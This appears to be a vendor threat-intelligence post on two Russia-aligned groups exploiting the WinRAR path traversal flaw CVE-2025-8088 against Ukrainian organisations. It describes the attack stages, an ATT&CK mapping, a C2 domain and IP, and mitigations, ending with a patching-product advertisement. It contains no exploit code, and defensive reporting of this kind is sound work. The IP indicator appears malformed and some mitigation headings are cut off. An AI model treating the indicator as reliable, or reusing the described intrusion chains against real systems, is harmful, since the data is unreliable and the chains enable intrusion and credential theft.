Two Actors, One Flaw: Gamaredon and UAC-0226 Leverage Delayed WinRAR Patching

Two Russia-aligned threat groups, Gamaredon and UAC-0226, are actively exploiting CVE-2025-8088, a high-severity WinRAR path traversal vulnerability, against Ukrainian government, military, and critical infrastructure organizations. Nearly a year after a patch was made available, both groups continued to operate unimpeded.

While both actors exploit the same vulnerability, their objectives and methods diverge sharply. Gamaredon, a Russian FSB-attributed group operational since 2013, deploys a sophisticated multi-stage toolchain designed for long-term persistent access and continuous intelligence collection. UAC-0226, a separately tracked Russia-aligned cluster, takes a leaner approach, deploying the GIFTEDCROOK stealer to harvest browser credentials and sensitive documents before erasing all forensic evidence and exiting cleanly.

CVE ID: CVE-2025-8088

CVSS Score: 8.8 High

Vulnerability Type: Path Traversal (CWE-22), allows arbitrary file placement outside the intended extraction directory via NTFS Alternate Data Streams

Affected Products: RARLAB WinRAR for Windows, all versions before 7.13

Fixed Version: WinRAR 7.13 (patch published July 2025)

Attack Vector: Requires the target to open a malicious RAR archive containing a weaponised payload hidden via path traversal

Primary Impact: Attackers silently place malicious files directly into sensitive Windows locations such as the Startup folder, achieving automatic code execution on the next user login

Gamaredon (also tracked as Armageddon, Earth Dahu) is a Russian state-sponsored threat group formally attributed to the Federal Security Service (FSB) by the Security Service of Ukraine and corroborated by multiple Western intelligence agencies. Operational since at least 2013, the group focuses exclusively on Ukrainian targets such as government ministries, military personnel, law enforcement, and critical infrastructure. What sets Gamaredon apart is their combination of high operational tempo and deliberate evasion: they run high-frequency spear-phishing campaigns, iterate their malware rapidly to outpace signatures, and systematically abuse legitimate platforms such as Telegram, Cloudflare, and Supabase as Dead Drop Resolvers for C2, blending malicious traffic with ordinary internet use. Trend Micro specifically describes Gamaredon as known for an "industrial-scale effort" to maintain long-term access to compromised organisations.

UAC-0226 (tracked as SHADOW-EARTH-066) is a separately tracked Russia-aligned cluster that has historically targeted Ukrainian organisations with Excel macro droppers. In this campaign, the group has made a notable tactical shift, abandoning macro-based delivery in favour of the CVE-2025-8088 RAR exploit chain. Equally notable is their move away from Telegram as an exfiltration channel to dedicated C2 servers, a change which is assessed as likely driven by Russia's blocking of Telegram in February 2026. Unlike Gamaredon, UAC-0226 prioritises clean exits: all malicious artifacts are deleted from the victim host after data is exfiltrated.

Gamaredon (Earth Dahu)

Phase 1: Spear-Phishing Delivery: A weaponised xHTML file is delivered via spear-phishing email. Upon opening, it displays a decoy message while sending a 1×1 tracking pixel to attacker infrastructure to confirm victim engagement, a Gamaredon technique in continuous use since 2018.

Phase 2: CVE-2025-8088 Exploitation: The xHTML page performs HTML smuggling, dropping a Base64-encoded RAR archive. When the victim extracts the visible PDF, the hidden HTA payload is silently placed into the Windows Startup folder via path traversal.

Phase 3: GammaPhish Execution: On next login, Windows auto-executes the HTA file. It is called mshta.exe, with a remote payload URL disguised by a fake BBC.com prefix, which retrieves and executes GammaLoad.

Phase 4: GammaLoad Staging: GammaLoad operates as a cascading four-stage VBScript downloader. It fingerprints the host, resolves live C2 addresses by parsing Telegram and Cloudflare-hosted Dead Drop Resolver pages, stores configuration in the Windows registry, and fetches final payloads.

Phase 5: GammaWorm Persistence and Propagation: GammaWorm copies itself into NTFS Alternate Data Streams, creates three scheduled tasks, and writes a RunOnce registry key. It then propagates to USB drives and network shares by hiding legitimate directories and replacing them with malicious LNK shortcuts that carry Ukrainian-language social-engineering lures.

Phase 6: GammaSteel Exfiltration: GammaSteel deploys 71 DPAPI-encrypted PowerShell modules into the Windows registry. It monitors local drives, network shares, and USB insertions in real time, exfiltrating targeted files to an S3-compatible cloud storage bucket with a fallback to attacker-controlled C2 servers.

UAC-0226 (SHADOW-EARTH-066)

Phase 1: RAR Archive Delivery: A crafted RAR archive is delivered to Ukrainian targets. The archive appears to contain a single decoy PDF document but contains three hidden payloads placed outside the extraction directory via CVE-2025-8088.

Phase 2: CVE-2025-8088 Exploitation: When the victim extracts the visible PDF, the three hidden ADS payloads are silently written to their target paths, including a Windows Shortcut (LNK) file placed directly into the Startup folder.

Phase 3: LNK Auto-Execution: On next login, Windows executes the LNK shortcut, which spawns a PowerShell loader via cmd.exe using in-memory DLL loading to avoid writing the final payload to disk.

Phase 4: GIFTEDCROOK Deployment: The PowerShell loader launches GIFTEDCROOK (result.dll), an updated information stealer targeting saved passwords and cookies from Chromium-based browsers (Chrome, Edge, Opera) and Firefox, as well as documents matching specific extensions from the victim's machine.

Phase 5: Exfiltration and Cleanup: Harvested credentials and documents are exfiltrated to dedicated C2 servers. Once exfiltration is completed, all malicious artifacts are deleted from the host to erase the forensic trail — a deliberate exit strategy that distinguishes UAC-0226 from Gamaredon's persistent-access model.

Gamaredon: Spear-Phishing xHTML Delivered → 1×1 Tracking Pixel Confirms Victim Opened Lure → HTML Smuggling Drops Weaponised RAR → CVE-2025-8088 Places HTA in Windows Startup Folder → GammaPhish Executes on Next Login via mshta.exe → GammaLoad Fetched via Fake-Legitimate URL → Host Fingerprinted, C2 Resolved via Telegram/Cloudflare DDRs → GammaWorm Deployed, Modules Hidden in NTFS ADS → Three Scheduled Tasks Created for Persistent Execution → USB Drives and Network Shares Hijacked with Malicious LNK Files → GammaSteel Activated, 71 Encrypted Modules Staged in Registry → Files Exfiltrated to AWS S3 with C2 Fallback → Persistent Multi-Stage Access Established

UAC-0226: Crafted RAR Archive Delivered → CVE-2025-8088 Places LNK Shortcut in Startup Folder + Two Additional ADS Payloads Written → LNK Auto-Executes on Next User Login → cmd.exe Spawns PowerShell Loader → In-Memory DLL Load Executes GIFTEDCROOK → Browser Passwords, Cookies, and Documents Harvested → Data Exfiltrated to Dedicated C2 Server → All Malicious Artifacts Deleted, Forensic Trail Erased

| ID | Tactic | Technique | Applies To | Description |

|----|--------|-----------|------------|-------------|

| TA0001 | Initial Access | T1566.001 — Spear-phishing Attachment | Both | Weaponised archives delivered via targeted phishing emails to Ukrainian government and military entities. |

| TA0002 | Execution | T1204.002 — Malicious File | Both | Victim opens RAR archive triggering CVE-2025-8088; dropped payload auto-executes from Windows Startup on next login. |

| TA0003 | Persistence | T1053.005 — Scheduled Task | Gamaredon | GammaWorm creates three scheduled tasks for redundant, reboot-surviving persistence. |

| TA0003 | Persistence | T1547.001 — Registry Run Keys / Startup Folder | Gamaredon | GammaWorm writes a RunOnce key (`ExplorerGuard`) to execute its ADS copy on every user logon. |

| TA0005 | Defense Evasion | T1564.004 — NTFS Alternate Data Streams | Both | Gamaredon hides core modules in NTFS ADS; UAC-0226 uses ADS to place hidden payloads outside the extraction directory. |

| TA0006 | Credential Access | T1555.003 — Credentials from Web Browsers | UAC-0226 | GIFTEDCROOK harvests saved passwords and cookies from Chromium and Firefox browser profiles. |

Gamaredon

Type - Indicator

Operator - Controlled C2 Domain quitethepastry[.]ru

C2 IP Address - 04.194.140[.]6

UAC-0226

Type - Indicator

Payload Filename - result.dll (GIFTEDCROOK)

Post-Exfiltration - All malicious artifacts self-deleted

1. Update WinRAR to Version 7.13 Immediately

2. Block Automatic HTA and LNK Execution

3. Audit NTFS Alternate Data Streams

4. Monitor and Audit Scheduled

5. Control USB Drive Access and Scan on

6. Monitor Dead Drop Resolver

7. Protect Browser Credential Stores

Saner Patch Management is a continuous, automated, and integrated solution that instantly fixes risks exploited in the wild. It supports major operating systems, including Windows, Linux, and macOS, as well as 550+ third-party applications.

It includes a safe testing sandbox to validate patches before production deployment, along with a patch rollback feature in the event of failure or system malfunction, ensuring your infrastructure stays protected without downtime risk.